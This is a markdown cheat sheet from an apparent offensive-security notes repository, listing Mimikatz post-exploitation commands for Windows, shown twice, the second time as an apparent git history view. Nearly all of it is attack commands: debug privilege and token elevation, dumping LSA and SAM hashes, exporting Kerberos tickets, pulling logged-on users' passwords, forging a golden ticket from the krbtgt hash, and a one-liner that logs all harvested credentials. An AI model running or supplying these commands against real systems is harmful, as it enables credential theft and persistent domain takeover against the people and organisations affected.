killchain-compendium/Post Exploitation/Windows/Mimikatz.md

# Mimikatz Usage
* Check your privilege, boy
```sh
privilege::debug
token::elevate
```

## Dump hashes

* NTLM
```sh
$ lsadump::lsa /patch
```
```sh
sekurlsa::tickets /export
```

## Dump Local Password hashes

```sh
token::elevate
```
```sh
lsadump::sam
```

* Form logged in users
```sh
sekurlsa::logonPasswords
```

## Golden ticket
* Dump krbtgt hashes and create a ticket, ticket is saved as ticket.kirbi
```sh
$ lsadump::lsa /inject /name:krbtgt
$ kerberos::golden /user:<userid> /domain:<domainname> /sid:<number behinde domainname> /krbtgt:<NTLMhash> /id:<RID(dec)>
```
* use the golden ticket, open a new elevated prompt
```sh
misc::cmd
```

## Oneliner
* Get the stuff
```sh
.\mimikatz "log host-42.log" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit
```
restructured Post Exploitation 2022-11-11 01:15:07 +01:00			`# Mimikatz Usage`
			`* Check your privilege, boy`
			```sh
			`privilege::debug`
			`token::elevate`
			```

			`## Dump hashes`

			`* NTLM`
			```sh
			`$ lsadump::lsa /patch`
			```
			```sh
			`sekurlsa::tickets /export`
			```

			`## Dump Local Password hashes`

			```sh
			`token::elevate`
			```
			```sh
			`lsadump::sam`
			```

			`* Form logged in users`
			```sh
			`sekurlsa::logonPasswords`
			```

			`## Golden ticket`
			`* Dump krbtgt hashes and create a ticket, ticket is saved as ticket.kirbi`
			```sh
			`$ lsadump::lsa /inject /name:krbtgt`
			`$ kerberos::golden /user:<userid> /domain:<domainname> /sid:<number behinde domainname> /krbtgt:<NTLMhash> /id:<RID(dec)>`
			```
			`* use the golden ticket, open a new elevated prompt`
			```sh
			`misc::cmd`
			```

			`## Oneliner`
			`* Get the stuff`
			```sh
			`.\mimikatz "log host-42.log" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit`
			```